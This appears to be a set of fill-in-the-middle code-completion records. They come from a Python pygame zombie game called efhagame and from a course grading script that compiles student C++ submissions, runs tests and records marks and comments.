def __getitem__(self, key):
if key == 0:
return self.x
elif key == 1:
return self.y
else:
raise IndexError("This "+str(key)+" key is not a vector key!")
def __sub__(self, o): # subtraction
return Vector(self.x - o.x, self.y - o.y)
def length(self): # get length (used for normalize)
return math.sqrt((self.x**2 + self.y**2))
def normalize(self): # divides a vector by its length
l = self.length()
if l != 0:
return (self.x / l, self.y / l)
return None
class Sprite(pygame.sprite.Sprite):
def __init__(self):
'''
Class:
creates a sprite
Parameters:
- self
'''
self.image = pygame.image.load("zombie.png").convert_alpha() # load image
self.rect = self.image.get_rect()
self.reset_position()
self.speed = 3 # movement speed of the sprite
self.normal_friction = .95 # friction while accelerating
self.slowing_friction = .8 # friction while slowing down
self.target = None # starts off with no target
def reset_position(self):
self.trueX = screenwidth / 2 # created because self.rect.center does not hold
self.trueY = screenheight - 50# decimal values but these do
self.rect.center = (self.trueX, self.trueY) # set starting position
self.speedX = 0 # speed in x direction
self.speedY = 0 # speed in y direction
self.target = None
def get_direction(self, target):
'''
Function:
takes total distance from sprite.center
to the sprites target
(gets direction to move)
Returns:
a normalized vector
Parameters:
- self
- target
x,y coordinates of the sprites target
can be any x,y coorinate pair in
brackets [x,y]
or parentheses (x,y)
'''
if self.target: # if the square has a target
position = Vector(self.rect.centerx, self.rect.centery) # create a vector from center x,y value
target = Vector(target[0], target[1]) # and one from the target x,y
self.dist = target - position # get total distance between target and position
direction = self.dist.normalize() # normalize so its constant in all directions
return direction
def distance_check(self, dist):
'''
Function:
tests if the total distance from the
sprite to the target is smaller than the
ammount of distance that would be normal
for the sprite to travel
(this lets the sprite know if it needs
to slow down. we want it to slow
down before it gets to it's target)
Returns:
bool
Parameters:
- self
- dist
this is the total distance from the
sprite to the target
can be any x,y value pair in
brackets [x,y]
or parentheses (x,y)
'''
dist_x = dist[0] ** 2 # gets absolute value of the x distance
dist_y = dist[1] ** 2 # gets absolute value of the y distance
t_dist = dist_x + dist_y # gets total absolute value distance
speed = self.speed ** 2 # gets aboslute value of the speed
if t_dist < (speed): # read function description above
return True
def update(self):
'''
Function:
gets direction to move then applies
the distance to the sprite.center | - self
'''
self.dir = self.get_direction(self.target) # get direction
if self.dir: # if there is a direction to move
if self.distance_check(self.dist): # if we need to slow down
self.speedX += (self.dir[0] * (self.speed / 2)) # reduced speed
self.speedY += (self.dir[1] * (self.speed / 2))
self.speedX *= self.slowing_friction # increased friction
self.speedY *= self.slowing_friction
else: # if we need to go normal speed
self.speedX += (self.dir[0] * self.speed) # calculate speed from direction to move and speed constant
self.speedY += (self.dir[1] * self.speed)
self.speedX *= self.normal_friction # apply friction
self.speedY *= self.normal_friction
self.trueX += self.speedX # store true x decimal values
self.trueY += self.speedY
self.rect.center = (round(self.trueX),round(self.trueY)) # apply values to sprite.center
class BrainSprite(pygame.sprite.Sprite):
def __init__(self):
pygame.sprite.Sprite.__init__(self)
self.image = pygame.image.load("brain.png").convert_alpha()
self.rect = self.image.get_rect()
class BrainSpriteCollection():
def __init__(self):
self.brainSpriteList = pygame.sprite.RenderPlain()
def reset(self):
self.brainSpriteList.empty()
for i in range(7):
brainSprite = BrainSprite()
brainSprite.rect.x = random.randrange(screenwidth)
brainSprite.rect.y = random.randrange(screenheight - 200)
#our brain interface is an enchanced random number generator with a seed defined by the user's mental state
self.brainSpriteList.add(brainSprite)
def returnList(self):
return self.brainSpriteList
'''This class is the functional and visual representation of the
expected user defined movement. The two axles are representative for
X and Y movement.
Finally, a movement vector will be created.'''
class MovementDesignator():
def __init__(self,screen):
self.screen = screen # get the screen as main surface
self.percentX = 100 # scaled from 1-100
self.percentY = 100 # scaled from 1-100: max value is real 246 pixel
def update(self):
pygame.draw.rect(self.screen,[50,50,50],[20,screenheight - 100,204,30],2) # graph for X coordination
pygame.draw.rect(self.screen,[50,50,50],[screenwidth - 100 , screenheight - 250 , 31, 200],2) # graph for Y coordination
if self.percentX:
self.realValueX = 2 * self.percentX
pygame.draw.line(self.screen, (255,0,0),(22,screenheight - 85),(self.realValueX + 22,screenheight - 85), 27)
if self.percentY:
self.realValueY = 2 * self.percentY
pygame.draw.line(self.screen, (255,0,0),(screenwidth - 85 ,screenheight - 52),(screenwidth - 85, (100 - self.realValueY) + screenheight - 148), 28)
else:
pygame.draw.line(self.screen, (255,0,0),(screenwidth - 85 ,screenheight - 52),(screenwidth - 85, screenheight - 52 ), 28)
def increase_graphX(self):
if self.percentX < 100:
self.percentX += 10
def decrease_graphX(self):
if self.percentX > 0:
self.percentX -= 10
def increase_graphY(self):
if self.percentY < 100:
self.percentY += 10
def decrease_graphY(self):
if self.percentY > 0:
self.percentY -= 10
def setX(self,x):
self.percentX = x
def setY(self,y):
self.percentY = y
def get_absolute_position(self):
screenX = screenwidth * self.percentX / 100
screenY = screenheight - (screenheight * self.percentY / 100)
#screenY = screenheight * self.percentY / 100
return (screenX,screenY)
def main():
screen = pygame.display.set_mode((screenwidth,screenheight))
pygame.display.set_caption("efhagame - Eat all Brains")
background_color = pygame.Surface(screen.get_size()).convert()
background_color.fill((0,0,0))
line_points = [] # make a list for points
line_color = (0, 255, 255) # color of the lines
line_points.append([screenwidth/2,screenheight-50])
sprite = Sprite() # create the sprite for the player
designator = MovementDesignator(screen) # show the movement vector as a compass like thing
designatorSelector = 0
brainSpriteCollection = BrainSpriteCollection()
brainSpriteCollection.reset()
#write the points
fontObj = pygame.font.Font('ts.ttf', 26)
scoreTextSurfaceObj = fontObj.render('Eat the Brains!', True, (0,0,0), (155,0,0))
scoreTextRectObj = scoreTextSurfaceObj.get_rect()
scoreTextRectObj.center = (screenwidth - 90, screenheight - 20)
#connection status
statusTextSurfaceObj = fontObj.render('Status: Red', True, (0,0,0), (155,0,0))
statusTextRectObj = statusTextSurfaceObj.get_rect()
statusTextRectObj.center = (120, screenheight - 20)
#sound init
plopSound = pygame.mixer.Sound('plop.ogg')
#background image
backgroundImage = pygame.image.load('background.png')
score = 0
clock = pygame.time.Clock()
running = True
while running:
clock.tick(30) #30 fps
for event in pygame.event.get():
if event.type == pygame.QUIT:
running = False
if event.type == MOUSEBUTTONDOWN:
sprite.target = event.pos # set the sprite.target to the mouse click position
line_points.append(event.pos) # add that point to the line list
if event.type == KEYDOWN:
if event.key == K_SPACE:
sprite.reset_position()
line_points.append([screenwidth / 2, screenheight - 50])
scoreTextSurfaceObj = fontObj.render('Eat the Brains!', True, (0,0,0), (155,0,0))
hitlist = None
score = 0
if event.key == K_UP:
designator.increase_graphX()
if event.key == K_DOWN:
designator.decrease_graphX()
if event.key == K_RIGHT:
designator.increase_graphY()
if event.key == K_LEFT:
designator.decrease_graphY()
if event.key == K_RETURN:
pos = designator.get_absolute_position()
sprite.target = pos
line_points.append(pos)
if event.key == K_r:
brainSpriteCollection.reset()
if event.key == K_c:
if designatorSelector == 0:
designatorSelector = 1
else:
designatorSelector = 0
#the stuff from the brain connector
screen.blit(background_color, (0,0)) #fill the screen with black colour
screen.blit(backgroundImage, (0,0))
designator.update() # for movement options
brainSpriteCollection.returnList().draw(screen) # the targets to hit
sprite.update() # update the sprite
screen.blit(sprite.image, sprite.rect.topleft) # blit the sprite to the screen
if len(line_points) > 1: # if there are enough points to draw a line
pygame.draw.lines(screen, line_color, False, line_points, 2) # surface, color of lines, uhh, points of lines, width of lines)
#collision detection and high score
hitlist = pygame.sprite.spritecollide(sprite, brainSpriteCollection.returnList(), True)
if len(hitlist) > 0:
score +=len(hitlist)
scoreTextSurfaceObj = fontObj.render('Total Score: ' + str(score), True, (0,0,0), (155,0,0))
print "hit"
thread.start_new_thread(plopSound.play,())
screen.blit(scoreTextSurfaceObj, scoreTextRectObj) # show the score
screen.blit(statusTextSurfaceObj, statusTextRectObj) # show the status
pygame.display.flip()
pygame.quit() # for a smooth quit
if __name__ == "__main__":
main() | ()
Parameters: | random_line_split |
game.py | ###################################################################################
###################################################################################
# efhagame - by Bartholomaeus Dedersen
# based on:
# Sprite Movement Towards Target Example + Physics
# programed/documented by Mad Cloud Games
# contact Mad Cloud Games @ madcloudgames@gmail.com with any comments, questions, or changes
#
# This project is released under the GNU General Public License V3
# This code is open source
# We would love to know what it gets used for
###################################################################################
###################################################################################
import pygame, math, random, thread
from pygame.locals import *
pygame.init()
screenwidth = 800
screenheight = 600
class Vector():
'''
Class:
creates operations to handle vectors such
as direction, position, and speed
'''
def __init__(self, x, y):
self.x = x
self.y = y
def __str__(self): # used for printing vectors
return "(%s, %s)"%(self.x, self.y)
def __getitem__(self, key):
if key == 0:
return self.x
elif key == 1:
return self.y
else:
raise IndexError("This "+str(key)+" key is not a vector key!")
def __sub__(self, o): # subtraction
return Vector(self.x - o.x, self.y - o.y)
def length(self): # get length (used for normalize)
return math.sqrt((self.x**2 + self.y**2))
def normalize(self): # divides a vector by its length
l = self.length()
if l != 0:
return (self.x / l, self.y / l)
return None
class Sprite(pygame.sprite.Sprite):
def __init__(self):
'''
Class:
creates a sprite
Parameters:
- self
'''
self.image = pygame.image.load("zombie.png").convert_alpha() # load image
self.rect = self.image.get_rect()
self.reset_position()
self.speed = 3 # movement speed of the sprite
self.normal_friction = .95 # friction while accelerating
self.slowing_friction = .8 # friction while slowing down
self.target = None # starts off with no target
def reset_position(self):
self.trueX = screenwidth / 2 # created because self.rect.center does not hold
self.trueY = screenheight - 50# decimal values but these do
self.rect.center = (self.trueX, self.trueY) # set starting position
self.speedX = 0 # speed in x direction
self.speedY = 0 # speed in y direction
self.target = None
def get_direction(self, target):
'''
Function:
takes total distance from sprite.center
to the sprites target
(gets direction to move)
Returns:
a normalized vector
Parameters:
- self
- target
x,y coordinates of the sprites target
can be any x,y coorinate pair in
brackets [x,y]
or parentheses (x,y)
'''
if self.target: # if the square has a target
position = Vector(self.rect.centerx, self.rect.centery) # create a vector from center x,y value
target = Vector(target[0], target[1]) # and one from the target x,y
self.dist = target - position # get total distance between target and position
direction = self.dist.normalize() # normalize so its constant in all directions
return direction
def distance_check(self, dist):
'''
Function:
tests if the total distance from the
sprite to the target is smaller than the
ammount of distance that would be normal
for the sprite to travel
(this lets the sprite know if it needs
to slow down. we want it to slow
down before it gets to it's target)
Returns:
bool
Parameters:
- self
- dist
this is the total distance from the
sprite to the target
can be any x,y value pair in
brackets [x,y]
or parentheses (x,y)
'''
dist_x = dist[0] ** 2 # gets absolute value of the x distance
dist_y = dist[1] ** 2 # gets absolute value of the y distance
t_dist = dist_x + dist_y # gets total absolute value distance
speed = self.speed ** 2 # gets aboslute value of the speed
if t_dist < (speed): # read function description above
return True
def update(self):
'''
Function:
gets direction to move then applies
the distance to the sprite.center
()
Parameters:
- self
'''
self.dir = self.get_direction(self.target) # get direction
if self.dir: # if there is a direction to move
if self.distance_check(self.dist): # if we need to slow down
self.speedX += (self.dir[0] * (self.speed / 2)) # reduced speed
self.speedY += (self.dir[1] * (self.speed / 2))
self.speedX *= self.slowing_friction # increased friction
self.speedY *= self.slowing_friction
else: # if we need to go normal speed
|
self.trueX += self.speedX # store true x decimal values
self.trueY += self.speedY
self.rect.center = (round(self.trueX),round(self.trueY)) # apply values to sprite.center
class BrainSprite(pygame.sprite.Sprite):
def __init__(self):
pygame.sprite.Sprite.__init__(self)
self.image = pygame.image.load("brain.png").convert_alpha()
self.rect = self.image.get_rect()
class BrainSpriteCollection():
def __init__(self):
self.brainSpriteList = pygame.sprite.RenderPlain()
def reset(self):
self.brainSpriteList.empty()
for i in range(7):
brainSprite = BrainSprite()
brainSprite.rect.x = random.randrange(screenwidth)
brainSprite.rect.y = random.randrange(screenheight - 200)
#our brain interface is an enchanced random number generator with a seed defined by the user's mental state
self.brainSpriteList.add(brainSprite)
def returnList(self):
return self.brainSpriteList
'''This class is the functional and visual representation of the
expected user defined movement. The two axles are representative for
X and Y movement.
Finally, a movement vector will be created.'''
class MovementDesignator():
def __init__(self,screen):
self.screen = screen # get the screen as main surface
self.percentX = 100 # scaled from 1-100
self.percentY = 100 # scaled from 1-100: max value is real 246 pixel
def update(self):
pygame.draw.rect(self.screen,[50,50,50],[20,screenheight - 100,204,30],2) # graph for X coordination
pygame.draw.rect(self.screen,[50,50,50],[screenwidth - 100 , screenheight - 250 , 31, 200],2) # graph for Y coordination
if self.percentX:
self.realValueX = 2 * self.percentX
pygame.draw.line(self.screen, (255,0,0),(22,screenheight - 85),(self.realValueX + 22,screenheight - 85), 27)
if self.percentY:
self.realValueY = 2 * self.percentY
pygame.draw.line(self.screen, (255,0,0),(screenwidth - 85 ,screenheight - 52),(screenwidth - 85, (100 - self.realValueY) + screenheight - 148), 28)
else:
pygame.draw.line(self.screen, (255,0,0),(screenwidth - 85 ,screenheight - 52),(screenwidth - 85, screenheight - 52 ), 28)
def increase_graphX(self):
if self.percentX < 100:
self.percentX += 10
def decrease_graphX(self):
if self.percentX > 0:
self.percentX -= 10
def increase_graphY(self):
if self.percentY < 100:
self.percentY += 10
def decrease_graphY(self):
if self.percentY > 0:
self.percentY -= 10
def setX(self,x):
self.percentX = x
def setY(self,y):
self.percentY = y
def get_absolute_position(self):
screenX = screenwidth * self.percentX / 100
screenY = screenheight - (screenheight * self.percentY / 100)
#screenY = screenheight * self.percentY / 100
return (screenX,screenY)
def main():
screen = pygame.display.set_mode((screenwidth,screenheight))
pygame.display.set_caption("efhagame - Eat all Brains")
background_color = pygame.Surface(screen.get_size()).convert()
background_color.fill((0,0,0))
line_points = [] # make a list for points
line_color = (0, 255, 255) # color of the lines
line_points.append([screenwidth/2,screenheight-50])
sprite = Sprite() # create the sprite for the player
designator = MovementDesignator(screen) # show the movement vector as a compass like thing
designatorSelector = 0
brainSpriteCollection = BrainSpriteCollection()
brainSpriteCollection.reset()
#write the points
fontObj = pygame.font.Font('ts.ttf', 26)
scoreTextSurfaceObj = fontObj.render('Eat the Brains!', True, (0,0,0), (155,0,0))
scoreTextRectObj = scoreTextSurfaceObj.get_rect()
scoreTextRectObj.center = (screenwidth - 90, screenheight - 20)
#connection status
statusTextSurfaceObj = fontObj.render('Status: Red', True, (0,0,0), (155,0,0))
statusTextRectObj = statusTextSurfaceObj.get_rect()
statusTextRectObj.center = (120, screenheight - 20)
#sound init
plopSound = pygame.mixer.Sound('plop.ogg')
#background image
backgroundImage = pygame.image.load('background.png')
score = 0
clock = pygame.time.Clock()
running = True
while running:
clock.tick(30) #30 fps
for event in pygame.event.get():
if event.type == pygame.QUIT:
running = False
if event.type == MOUSEBUTTONDOWN:
sprite.target = event.pos # set the sprite.target to the mouse click position
line_points.append(event.pos) # add that point to the line list
if event.type == KEYDOWN:
if event.key == K_SPACE:
sprite.reset_position()
line_points.append([screenwidth / 2, screenheight - 50])
scoreTextSurfaceObj = fontObj.render('Eat the Brains!', True, (0,0,0), (155,0,0))
hitlist = None
score = 0
if event.key == K_UP:
designator.increase_graphX()
if event.key == K_DOWN:
designator.decrease_graphX()
if event.key == K_RIGHT:
designator.increase_graphY()
if event.key == K_LEFT:
designator.decrease_graphY()
if event.key == K_RETURN:
pos = designator.get_absolute_position()
sprite.target = pos
line_points.append(pos)
if event.key == K_r:
brainSpriteCollection.reset()
if event.key == K_c:
if designatorSelector == 0:
designatorSelector = 1
else:
designatorSelector = 0
#the stuff from the brain connector
screen.blit(background_color, (0,0)) #fill the screen with black colour
screen.blit(backgroundImage, (0,0))
designator.update() # for movement options
brainSpriteCollection.returnList().draw(screen) # the targets to hit
sprite.update() # update the sprite
screen.blit(sprite.image, sprite.rect.topleft) # blit the sprite to the screen
if len(line_points) > 1: # if there are enough points to draw a line
pygame.draw.lines(screen, line_color, False, line_points, 2) # surface, color of lines, uhh, points of lines, width of lines)
#collision detection and high score
hitlist = pygame.sprite.spritecollide(sprite, brainSpriteCollection.returnList(), True)
if len(hitlist) > 0:
score +=len(hitlist)
scoreTextSurfaceObj = fontObj.render('Total Score: ' + str(score), True, (0,0,0), (155,0,0))
print "hit"
thread.start_new_thread(plopSound.play,())
screen.blit(scoreTextSurfaceObj, scoreTextRectObj) # show the score
screen.blit(statusTextSurfaceObj, statusTextRectObj) # show the status
pygame.display.flip()
pygame.quit() # for a smooth quit
if __name__ == "__main__":
main()
| self.speedX += (self.dir[0] * self.speed) # calculate speed from direction to move and speed constant
self.speedY += (self.dir[1] * self.speed)
self.speedX *= self.normal_friction # apply friction
self.speedY *= self.normal_friction | conditional_block |
game.py | ###################################################################################
###################################################################################
# efhagame - by Bartholomaeus Dedersen
# based on:
# Sprite Movement Towards Target Example + Physics
# programed/documented by Mad Cloud Games
# contact Mad Cloud Games @ madcloudgames@gmail.com with any comments, questions, or changes
#
# This project is released under the GNU General Public License V3
# This code is open source
# We would love to know what it gets used for
###################################################################################
###################################################################################
import pygame, math, random, thread
from pygame.locals import *
pygame.init()
screenwidth = 800
screenheight = 600
class Vector():
'''
Class:
creates operations to handle vectors such
as direction, position, and speed
'''
def __init__(self, x, y):
self.x = x
self.y = y
def __str__(self): # used for printing vectors
return "(%s, %s)"%(self.x, self.y)
def __getitem__(self, key):
if key == 0:
return self.x
elif key == 1:
return self.y
else:
raise IndexError("This "+str(key)+" key is not a vector key!")
def __sub__(self, o): # subtraction
return Vector(self.x - o.x, self.y - o.y)
def length(self): # get length (used for normalize)
return math.sqrt((self.x**2 + self.y**2))
def normalize(self): # divides a vector by its length
|
class Sprite(pygame.sprite.Sprite):
def __init__(self):
'''
Class:
creates a sprite
Parameters:
- self
'''
self.image = pygame.image.load("zombie.png").convert_alpha() # load image
self.rect = self.image.get_rect()
self.reset_position()
self.speed = 3 # movement speed of the sprite
self.normal_friction = .95 # friction while accelerating
self.slowing_friction = .8 # friction while slowing down
self.target = None # starts off with no target
def reset_position(self):
self.trueX = screenwidth / 2 # created because self.rect.center does not hold
self.trueY = screenheight - 50# decimal values but these do
self.rect.center = (self.trueX, self.trueY) # set starting position
self.speedX = 0 # speed in x direction
self.speedY = 0 # speed in y direction
self.target = None
def get_direction(self, target):
'''
Function:
takes total distance from sprite.center
to the sprites target
(gets direction to move)
Returns:
a normalized vector
Parameters:
- self
- target
x,y coordinates of the sprites target
can be any x,y coorinate pair in
brackets [x,y]
or parentheses (x,y)
'''
if self.target: # if the square has a target
position = Vector(self.rect.centerx, self.rect.centery) # create a vector from center x,y value
target = Vector(target[0], target[1]) # and one from the target x,y
self.dist = target - position # get total distance between target and position
direction = self.dist.normalize() # normalize so its constant in all directions
return direction
def distance_check(self, dist):
'''
Function:
tests if the total distance from the
sprite to the target is smaller than the
ammount of distance that would be normal
for the sprite to travel
(this lets the sprite know if it needs
to slow down. we want it to slow
down before it gets to it's target)
Returns:
bool
Parameters:
- self
- dist
this is the total distance from the
sprite to the target
can be any x,y value pair in
brackets [x,y]
or parentheses (x,y)
'''
dist_x = dist[0] ** 2 # gets absolute value of the x distance
dist_y = dist[1] ** 2 # gets absolute value of the y distance
t_dist = dist_x + dist_y # gets total absolute value distance
speed = self.speed ** 2 # gets aboslute value of the speed
if t_dist < (speed): # read function description above
return True
def update(self):
'''
Function:
gets direction to move then applies
the distance to the sprite.center
()
Parameters:
- self
'''
self.dir = self.get_direction(self.target) # get direction
if self.dir: # if there is a direction to move
if self.distance_check(self.dist): # if we need to slow down
self.speedX += (self.dir[0] * (self.speed / 2)) # reduced speed
self.speedY += (self.dir[1] * (self.speed / 2))
self.speedX *= self.slowing_friction # increased friction
self.speedY *= self.slowing_friction
else: # if we need to go normal speed
self.speedX += (self.dir[0] * self.speed) # calculate speed from direction to move and speed constant
self.speedY += (self.dir[1] * self.speed)
self.speedX *= self.normal_friction # apply friction
self.speedY *= self.normal_friction
self.trueX += self.speedX # store true x decimal values
self.trueY += self.speedY
self.rect.center = (round(self.trueX),round(self.trueY)) # apply values to sprite.center
class BrainSprite(pygame.sprite.Sprite):
def __init__(self):
pygame.sprite.Sprite.__init__(self)
self.image = pygame.image.load("brain.png").convert_alpha()
self.rect = self.image.get_rect()
class BrainSpriteCollection():
def __init__(self):
self.brainSpriteList = pygame.sprite.RenderPlain()
def reset(self):
self.brainSpriteList.empty()
for i in range(7):
brainSprite = BrainSprite()
brainSprite.rect.x = random.randrange(screenwidth)
brainSprite.rect.y = random.randrange(screenheight - 200)
#our brain interface is an enchanced random number generator with a seed defined by the user's mental state
self.brainSpriteList.add(brainSprite)
def returnList(self):
return self.brainSpriteList
'''This class is the functional and visual representation of the
expected user defined movement. The two axles are representative for
X and Y movement.
Finally, a movement vector will be created.'''
class MovementDesignator():
def __init__(self,screen):
self.screen = screen # get the screen as main surface
self.percentX = 100 # scaled from 1-100
self.percentY = 100 # scaled from 1-100: max value is real 246 pixel
def update(self):
pygame.draw.rect(self.screen,[50,50,50],[20,screenheight - 100,204,30],2) # graph for X coordination
pygame.draw.rect(self.screen,[50,50,50],[screenwidth - 100 , screenheight - 250 , 31, 200],2) # graph for Y coordination
if self.percentX:
self.realValueX = 2 * self.percentX
pygame.draw.line(self.screen, (255,0,0),(22,screenheight - 85),(self.realValueX + 22,screenheight - 85), 27)
if self.percentY:
self.realValueY = 2 * self.percentY
pygame.draw.line(self.screen, (255,0,0),(screenwidth - 85 ,screenheight - 52),(screenwidth - 85, (100 - self.realValueY) + screenheight - 148), 28)
else:
pygame.draw.line(self.screen, (255,0,0),(screenwidth - 85 ,screenheight - 52),(screenwidth - 85, screenheight - 52 ), 28)
def increase_graphX(self):
if self.percentX < 100:
self.percentX += 10
def decrease_graphX(self):
if self.percentX > 0:
self.percentX -= 10
def increase_graphY(self):
if self.percentY < 100:
self.percentY += 10
def decrease_graphY(self):
if self.percentY > 0:
self.percentY -= 10
def setX(self,x):
self.percentX = x
def setY(self,y):
self.percentY = y
def get_absolute_position(self):
screenX = screenwidth * self.percentX / 100
screenY = screenheight - (screenheight * self.percentY / 100)
#screenY = screenheight * self.percentY / 100
return (screenX,screenY)
def main():
screen = pygame.display.set_mode((screenwidth,screenheight))
pygame.display.set_caption("efhagame - Eat all Brains")
background_color = pygame.Surface(screen.get_size()).convert()
background_color.fill((0,0,0))
line_points = [] # make a list for points
line_color = (0, 255, 255) # color of the lines
line_points.append([screenwidth/2,screenheight-50])
sprite = Sprite() # create the sprite for the player
designator = MovementDesignator(screen) # show the movement vector as a compass like thing
designatorSelector = 0
brainSpriteCollection = BrainSpriteCollection()
brainSpriteCollection.reset()
#write the points
fontObj = pygame.font.Font('ts.ttf', 26)
scoreTextSurfaceObj = fontObj.render('Eat the Brains!', True, (0,0,0), (155,0,0))
scoreTextRectObj = scoreTextSurfaceObj.get_rect()
scoreTextRectObj.center = (screenwidth - 90, screenheight - 20)
#connection status
statusTextSurfaceObj = fontObj.render('Status: Red', True, (0,0,0), (155,0,0))
statusTextRectObj = statusTextSurfaceObj.get_rect()
statusTextRectObj.center = (120, screenheight - 20)
#sound init
plopSound = pygame.mixer.Sound('plop.ogg')
#background image
backgroundImage = pygame.image.load('background.png')
score = 0
clock = pygame.time.Clock()
running = True
while running:
clock.tick(30) #30 fps
for event in pygame.event.get():
if event.type == pygame.QUIT:
running = False
if event.type == MOUSEBUTTONDOWN:
sprite.target = event.pos # set the sprite.target to the mouse click position
line_points.append(event.pos) # add that point to the line list
if event.type == KEYDOWN:
if event.key == K_SPACE:
sprite.reset_position()
line_points.append([screenwidth / 2, screenheight - 50])
scoreTextSurfaceObj = fontObj.render('Eat the Brains!', True, (0,0,0), (155,0,0))
hitlist = None
score = 0
if event.key == K_UP:
designator.increase_graphX()
if event.key == K_DOWN:
designator.decrease_graphX()
if event.key == K_RIGHT:
designator.increase_graphY()
if event.key == K_LEFT:
designator.decrease_graphY()
if event.key == K_RETURN:
pos = designator.get_absolute_position()
sprite.target = pos
line_points.append(pos)
if event.key == K_r:
brainSpriteCollection.reset()
if event.key == K_c:
if designatorSelector == 0:
designatorSelector = 1
else:
designatorSelector = 0
#the stuff from the brain connector
screen.blit(background_color, (0,0)) #fill the screen with black colour
screen.blit(backgroundImage, (0,0))
designator.update() # for movement options
brainSpriteCollection.returnList().draw(screen) # the targets to hit
sprite.update() # update the sprite
screen.blit(sprite.image, sprite.rect.topleft) # blit the sprite to the screen
if len(line_points) > 1: # if there are enough points to draw a line
pygame.draw.lines(screen, line_color, False, line_points, 2) # surface, color of lines, uhh, points of lines, width of lines)
#collision detection and high score
hitlist = pygame.sprite.spritecollide(sprite, brainSpriteCollection.returnList(), True)
if len(hitlist) > 0:
score +=len(hitlist)
scoreTextSurfaceObj = fontObj.render('Total Score: ' + str(score), True, (0,0,0), (155,0,0))
print "hit"
thread.start_new_thread(plopSound.play,())
screen.blit(scoreTextSurfaceObj, scoreTextRectObj) # show the score
screen.blit(statusTextSurfaceObj, statusTextRectObj) # show the status
pygame.display.flip()
pygame.quit() # for a smooth quit
if __name__ == "__main__":
main()
| l = self.length()
if l != 0:
return (self.x / l, self.y / l)
return None | identifier_body |
mark.py | #!/bin/env python3
# Evan Wilde (c) 2017
# My big insane marking script of doom 😈
import argparse
import os
import sys
import csv
import re
import shutil
import subprocess
from subprocess import call
username_pattern = r".*\((.*)\)$"
username_expr = re.compile(username_pattern)
test_pattern = r"(100|[1-9][0-9]|[0-9])% tests passed, ([0-9]+) tests failed out of ([0-9]+)"
test_expr = re.compile(test_pattern)
## Helper Functions
# Deletes files in folder, it ignores filenames in ignore list
def removeFiles(folder, ignore=[], skipdirs=True):
"Deletes all files that are in folder"
for f in os.listdir(folder):
if f in ignore:
continue
try:
fpath = os.path.join(folder, f)
if os.path.isfile(fpath):
os.remove(fpath)
elif os.path.isdir(fpath) and not skipdirs:
shutil.rmtree(fpath)
except Exception as e:
print(f"Threw an exception {e}")
# from, to (copies all files in from, to the to dir)
def copyContents(f, t):
"Copy all files in f into t dir"
[shutil.copy(os.path.join(f, p), t)
if os.path.isfile(os.path.join(f, p))
else shutil.copytree(os.path.join(f, p), os.path.join(t, p))
for p in os.listdir(f)]
## Viewer Modes
def editFile(fname):
if | ef appendToFile(fname, content):
with open(fname, 'a+') as FILE:
FILE.write(content)
# Show stuff
def viewData(content):
PAGER = os.environ.get('PAGER')
if PAGER and len(content.split('\n')) > 20:
if PAGER == 'less':
subprocess.run([os.environ.get("PAGER"), '-N'], input=content.encode('utf-8'))
else:
subprocess.run([os.environ.get("PAGER")], input=content.encode('utf-8'))
else:
os.system("clear")
print(content)
# Read a file and show it
def viewFile(fname):
if os.path.isfile(fname):
with open(fname, 'r') as FILE:
viewData(FILE.read())
# Get files in a directory
def getFiles(dirc):
return [x for x in os.listdir(dirc) if x is not os.path.isdir(x)]
# Prompt user to select an item
def selectItems(itms):
prmt = '\t' + '\n\t'.join([f"({num+1}): {nm}"
for num, nm in enumerate(itms)]) + '\n [1] >>: '
while True:
i = input(prmt)
if i == '':
return (0, itms[0])
try:
select = int(i)
except ValueError:
continue
if select <= len(itms) and select > 0:
return (select-1, itms[select-1])
## Main Functions
def loadTmpDir(submissiondir, assndir, tmpdir, outputdir):
"""Load user submission to staging area
Loads the testing files into the tmpdir
Will create build folder and cd into that for compiling and marking
Calls the compile and marking functions.
If the program does not compile, the submission receives a zero and is not
passed forward to marking.
:rootdir: The root directory where the assignments are (directory with
student names)
:tmpdir: Where compilation and marking are occurring
:assndir: location where original assignment is kept
"""
# Deals with the joys of connex BS
# Copy and open grade file
in_gradefname = os.path.join(submissiondir, 'grades.csv')
out_gradefname = os.path.join(outputdir, 'grades.csv')
if not os.path.exists(in_gradefname):
print("grade.csv doesn't exist", "Re-download submissions from Connex with grade.csv included", sep="\n", file=sys.stderr)
exit(1)
with open(in_gradefname, 'r') as gradeFile:
gradeReader = csv.reader(gradeFile, delimiter=',')
l = [row for row in gradeReader]
header = l[:3]
order = [stud[1] for stud in l[3:]]
details = {stud[1]: stud for stud in l[3:]}
submissions = {username_expr.search(p).groups()[0]: p for p in os.listdir(submissiondir) if username_expr.search(p)}
assert len(details) == len(submissions) # If these don't match, panic
cwd = os.getcwd() # Store this so we can go back to it later
# And here we go with actually driving this stupid boat
for idx, f in enumerate(details):
submission_path = os.path.join(submissiondir, submissions[f], "Submission attachment(s)")
output_path = os.path.join(outputdir, submissions[f])
# If it has already been marked, show the marks and copy the comments file
if details[f][-1]:
if os.path.isfile(os.path.join(submissiondir, submissions[f], 'comments.txt')):
shutil.copy(os.path.join(submissiondir, submissions[f], 'comments.txt'), tmpdir)
resp = input(f"{f}[{details[f][-1]}] already marked: Remark? [y/N]:")
if resp.lower() != 'y':
# Copy comment file
if not os.path.isfile(os.path.abspath("./comments.txt")):
with open(os.path.abspath("./comments.txt"), 'w'):
pass # Just create it and leave
if not os.path.isdir(output_path):
os.mkdir(output_path)
shutil.copy(os.path.abspath("./comments.txt"),
os.path.join(output_path, "comments.txt"))
continue
copyContents(submission_path, tmpdir)
copyContents(assndir, tmpdir) # Will overwrite anything already there
if not os.path.isdir(os.path.join(tmpdir, 'build')):
os.mkdir(os.path.join(tmpdir, 'build'))
os.chdir(os.path.join(tmpdir, 'build'))
compiled, compile_msg = cpp_compile() # compile submission
if compiled:
score, output, correct, total = mark()
else:
score = 0
output = "Failed to compile"
correct = 0
total = 0
# Okay, back to the workdir for comments and shipping the mark
os.chdir(tmpdir)
options = ["Keep",
"Comment",
"Replace Grade",
"Show Compiler Output",
"Show Test Output",
"Show Comment",
"Append compiler message",
"Append Test Output",
"View Submission"]
while True:
print(f"""Marking {submissions[f]}:
Student {idx+1} / {len(details)}
Mark: {score} ({correct} / {total})""")
cidx, cmd = selectItems(options)
if cidx == 0:
break
elif cidx == 1: # Comment on file
editFile(os.path.abspath("./comments.txt"))
continue
elif cidx == 2: # Change grade
score = round(float(input("New Grade: ")), 2)
continue
elif cidx == 3:
viewData(compile_msg)
elif cidx == 4:
viewData(output)
elif cidx == 5:
viewFile(os.path.abspath("./comments.txt"))
elif cidx == 6:
appendToFile(os.path.abspath("./comments.txt"),
